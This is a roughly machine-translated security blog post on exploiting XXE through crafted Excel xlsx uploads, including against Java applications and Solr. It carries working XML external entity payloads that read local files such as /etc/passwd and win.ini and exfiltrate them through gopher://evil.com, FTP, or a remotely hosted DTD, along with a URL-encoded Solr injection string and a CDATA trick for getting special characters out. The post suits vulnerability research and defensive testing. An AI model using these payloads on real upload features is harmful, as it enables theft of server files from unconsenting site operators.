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Record an excel xxE vulnerability
2022-07-06 03:59:00 【Bright moon and clear wind~~】
Remember a excel XXE Loophole
LSA / 2020-05-21 09:00:16 / Browse the number 20953 Safety technology Vulnerability analysis [ The top (1)](javascript:) [ Step on (0)](javascript:)
0x00 summary
Microsoft Office from 2007 The version introduces a new open XML File format , Compression based ZIP File format specification , Change the suffix to zip After decompressing, you can find that most of them are describing workbook data 、 Metadata 、 Document information XML file .
Many websites allow uploading / Import files , Processing the internal data of the file will generally be parsed XML, If the parser is not safely configured , There may be XXE Loophole .
Usually, most parsing starts with xl/workbook.xml, It provides an overview of the workbook contents , A list of worksheets and their names . The worksheets are located in xl/worksheets Under the table of contents , Usually the content ends up in xl/sharedStrings.xml.
Most applications seem to be xl / workbook.xml Put it in XML Parser to get a list of worksheets , Then read each worksheet separately to get the cell content .
xls And xlsx The format is different ,xls Is a unique binary format , Its core structure is compound document type , and xlsx The core structure of XML type , The adoption is based on XML Compression mode of .xls Format file cannot be inserted payload Conduct XXE attack .
When it comes to testing , According to the function point ,docx,xlsx You can try anything .
0x01 Vulnerability discovery
Make xlsx:
unzip ImportProductTemplate.xlsx
zip -r xxetest00.xslx *
Even if the import fails , Also successfully parsed xml
Because it is java The station of , So the use of ftp Protocol read file
Maybe because of the goal jdk Version too high , Unable to read the file with newline completely , Can't list directories .
excel xxe Can trigger parsing xlsx Internal documents :
These can also be tried :
0x02 reflection
java Environmental Science , Whether it is successful to read the file with newline and java edition / Operating system .
php It can be used base64 Code out , as follows :
<!ENTITY % payload SYSTEM "php://filter/read=convert.base64-encode/resource=file:///c:/windows/win.ini">
<!ENTITY % int "<!ENTITY % trick SYSTEM ';'>">
and java There's going to be an anomaly
Low version Java You can use gopher(java1.6) Bring out
<!ENTITY % payload SYSTEM "file:///c:/Windows/win.ini"><!ENTITY % int "<!ENTITY % trick SYSTEM 'gopher://evil.com/%payload;'>">
Higher version java( I don't know from 1.8 Which version starts ) Of ftp The agreement restricts line breaks
// Some versions java There will be checkUrl() stay issueCommand() Check before \n
Java Supported protocols
As a general rule, when reading multi line files , Higher version java If you encounter an exception, you can't read , however /etc/passwd You can return the part of the first line , Other files are not returned .
utilize solr xxe Vulnerability testing
java 8u151<%3Fxml version%3D"1.0" encoding%3D"UTF-8"%3F>%0A<!DOCTYPE root [%0A<!ENTITY %25 remote SYSTEM "http%3A%2F%2F192.168.1.2:8099%2Fx0.dtd">%0A%25remote%3B]>%0A<root%2F>&wt=xml&defType=xmlparser
Try reading a multiline file
ftp No return , however /etc/passwd There is a return
http No return
ftp Read passwd The following exception occurred , It should be a line breaking problem , Can return part of the first line
org.apache.solr.search.SyntaxError: Error parsing XML stream:java.io.IOException: sun.net.ftp.FtpProtocolException: Illegal FTP command in {q=<?xml+version%3D"1.0"+encoding%3D"UTF-8"?>%0a<!DOCTYPE+root+[%0a<!ENTITY+%25+remote+SYSTEM+"">%0a%25remote;]>%0a<root/>&defType=xmlparser&df=_text_&rows=10&wt=xml&echoParams=explicit}
http read passwd Not a line returned , It should also be a line breaking problem
org.apache.solr.search.SyntaxError: Error parsing XML stream:java.net.MalformedURLException: Illegal character in URL in {q=<?xml+version%3D"1.0"+encoding%3D"UTF-8"?>%0a<!DOCTYPE+root+[%0a<!ENTITY+%25+remote+SYSTEM+"">%0a%25remote;]>%0a<root/>&defType=xmlparser&df=_text_&rows=10&wt=xml&echoParams=explicit}
Read a single line file :
http Successfully returns
ftp Successfully returns
Win7(8u201) Next test passwd The first line of can return ,win.ini No return …
Continue testing , It is found that the last one can be returned /b Front part
linux It's the same thing
Interested gods can debug , Maybe one CVE And that's what happened …
By the way , If the file contains
‘ “ < > &
Reading directly will report an error
You can use CDATA
from <![CDATA[ Start , from ]]> end
It can be used for xxe There is echo
<!ENTITY % start "<![CDATA[">
<!ENTITY % end "]]>">
<!ENTITY % c "<!ENTITY % rrr SYSTEM 'ftp://xxx/%start;%r;%end;'>">
<?xml version="1.0"?>
<!DOCTYPE cdl [
<!ENTITY % r SYSTEM "file:///c:/Windows/win.ini">
<!ENTITY % asd SYSTEM "">
0x03 Related cases
QQ mailbox XXE Can read any file
Netease mailbox somewhere XXE Readable file
0x04 Reference material
www.mi1k7ea.com/2019/02/13/XML Injected DocumentBuilder/
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